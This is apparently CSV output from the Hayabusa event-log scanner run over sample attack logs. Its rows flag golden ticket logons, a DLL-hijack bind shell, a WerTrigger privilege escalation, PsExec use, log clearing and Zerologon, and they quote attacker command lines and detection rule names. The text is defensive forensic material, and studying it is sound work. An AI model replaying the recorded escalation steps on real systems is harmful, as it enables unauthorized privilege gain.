0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.566 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:07.558 
+09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx -2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : 
Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 
0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP 
Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 
172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon 
Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: 
Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx -2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx -2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
